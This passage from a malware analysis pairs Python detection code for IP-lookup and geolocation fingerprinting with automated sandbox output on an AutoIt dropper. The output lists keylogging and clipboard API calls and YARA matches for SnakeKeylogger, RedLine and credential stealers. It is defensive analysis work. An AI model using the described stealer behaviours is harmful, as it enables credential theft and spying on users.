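def assess_request(raw: str) -> list[str]:
    """Indicators matched by a single request."""
    _method, path, headers = parse_request(raw)
    host = headers.get("host", "").lower()
    ua = headers.get("user-agent")
    hits = []
    if host in IP_CHECK_HOSTS:
        hits.append(f"public IP lookup via {host}")
    if host == GEOIP_HOST and path.startswith("/xml/"):
        hits.append("geolocation lookup for " + path[len("/xml/"):])
    if ua is None:
        hits.append("no User-Agent header")  # 'HTTP GET or POST without a user agent'
    elif ua == LEGACY_UA:
        hits.append("hard-coded legacy User-Agent of this sample")
    return hits


def find_fingerprint_chains(records, window=timedelta(minutes=2)):
    """records: (timestamp, client_ip, raw_request). Returns (client, ip) for every client
    that asked a public-IP service and then requested geolocation of an address within window."""
    last_ip_check: dict[str, datetime] = {}
    chains = []
    for ts, client, raw in sorted(records, key=lambda r: r[0]):
        _method, path, headers = parse_request(raw)
        host = headers.get("host", "").lower()
        if host in IP_CHECK_HOSTS:
            last_ip_check[client] = ts
        elif host == GEOIP_HOST and path.startswith("/xml/"):
            seen = last_ip_check.get(client)
            if seen is not None and ts - seen <= window:
                chains.append((client, path[len("/xml/"):]))
    return chains


SAMPLE_REQUESTS = [
    "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\nConnection: Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: " + LEGACY_UA + "\r\nHost: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n",
    # Constructed benign control request.
    "GET / HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n\r\n",
]

# Constructed timeline: the public-IP lookup precedes the geolocation query, as the DNS order suggests.
T0 = datetime(2024, 12, 16, 14, 11, 35)
SAMPLE_RECORDS = [
    (T0, "192.168.2.5", SAMPLE_REQUESTS[1]),
    (T0 + timedelta(seconds=4), "192.168.2.5", SAMPLE_REQUESTS[0]),
    (T0 + timedelta(seconds=9), "192.168.2.7", SAMPLE_REQUESTS[2]),
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(raw.split("\r\n", 1)[0], "->", assess_request(raw) or ["clean"])
    print("fingerprint chains:", find_fingerprint_chains(SAMPLE_RECORDS))
```

The per-request indicators are noisy on their own (plenty of legitimate software asks checkip.dyndns.org for its address); the chain across two different lookup services from one client within a short window is the part worth alerting on.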

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01044164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00664164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01043F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0105CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0067CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: 5.2.nonplacental.exe.3c60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 6.2.RegSvcs.exe.2970000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.53a0000.6.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.3d86458.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.3d85570.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.53a0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.2b2097e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 2.2.nonplacental.exe.3b30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
Source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.3dae190.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.3d86458.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.2b21866.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.2b2097e.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 6.2.RegSvcs.exe.2970ee8.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 6.2.RegSvcs.exe.2970ee8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.2b21866.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 3.2.RegSvcs.exe.3d85570.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 00000005.00000002.2197923866.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.2081325248.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: Process Memory Space: RegSvcs.exe PID: 6660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 3128, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00FD3B3A
                  Source: ref_97024130865.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ref_97024130865.exe, 00000000.00000000.2052580050.0000000001084000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_7e0bcb6e-d
                  Source: ref_97024130865.exe, 00000000.00000000.2052580050.0000000001084000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_f917a428-7
                  Source: ref_97024130865.exe, 00000000.00000003.2060707682.0000000003D83000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_52f4fc01-2
                  Source: ref_97024130865.exe, 00000000.00000003.2060707682.0000000003D83000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_4a92ec0e-e
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: This is a third-party compiled AutoIt script. | 2_2_005F3B3A
                  Source: nonplacental.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: nonplacental.exe, 00000002.00000002.2080812875.00000000006A4000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_11b494a7-3
                  Source: nonplacental.exe, 00000002.00000002.2080812875.00000000006A4000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_a7d54ca7-9
                  Source: nonplacental.exe, 00000005.00000002.2196691732.00000000006A4000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_64a12cc3-9
                  Source: nonplacental.exe, 00000005.00000002.2196691732.00000000006A4000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_30f857b1-c
                  Source: ref_97024130865.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_97112700-6
                  Source: ref_97024130865.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_dfc54ab6-5
                  Source: nonplacental.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_ed7bc412-9
                  Source: nonplacental.exe.0.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_d7daf398-c
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103A1EF: GetFullPathNameW, __swprintf, CreateDirectoryW, CreateFileW, _memset, _wcsncpy, DeviceIoControl, CloseHandle, RemoveDirectoryW, CloseHandle
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01028310: _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_010351BD: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_006551BD: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FFD975
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FF21C5
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_010503DA
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_010062D2
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FF25FA
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0100242E
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FE66E1
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FDE6A0
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0100878F
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0102E616
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FE8808
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01006844
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01050857
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01038889
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FFCB21
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01006DB6
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FE6F9E
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FE3030
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FFF1D9
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FF3187
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FD1287
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FF1484
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FE5520
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FF7696
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FE5760
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FF1978
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01009AB5
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FDFCE0
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01057DDB
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FFBDA6
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FF1D90
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FE3FE0
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_00FDDF00
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_015847D8
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_005FE6A0
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0061D975
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_005FFCE0
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_006121C5
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_006262D2
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_006703DA
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0062242E
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_006125FA
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0064E616
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_006066E1
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0062878F
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00626844
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00670857
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00608808
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00658889
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0061CB21
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00626DB6
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00606F9E
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00603030
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0061F1D9
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00613187
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_005F1287
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00611484
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00605520
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00617696
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00605760
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00611978
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00629AB5
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00677DDB
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0061BDA6
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00611D90
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_005FDF00
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00603FE0
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_017942E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00F81448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00F81439
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00F811A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00F81199
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 5_2_01948338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_02501443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_02501448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_025011A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_025011A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: String function: 005F7DE1 appears 36 times
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: String function: 00618900 appears 42 times
                  Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: String function: 00610AE3 appears 70 times
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: String function: 00FF8900 appears 42 times
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: String function: 00FD7DE1 appears 35 times
                  Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: String function: 00FF0AE3 appears 70 times
                  Source: ref_97024130865.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 5.2.nonplacental.exe.3c60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine | snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
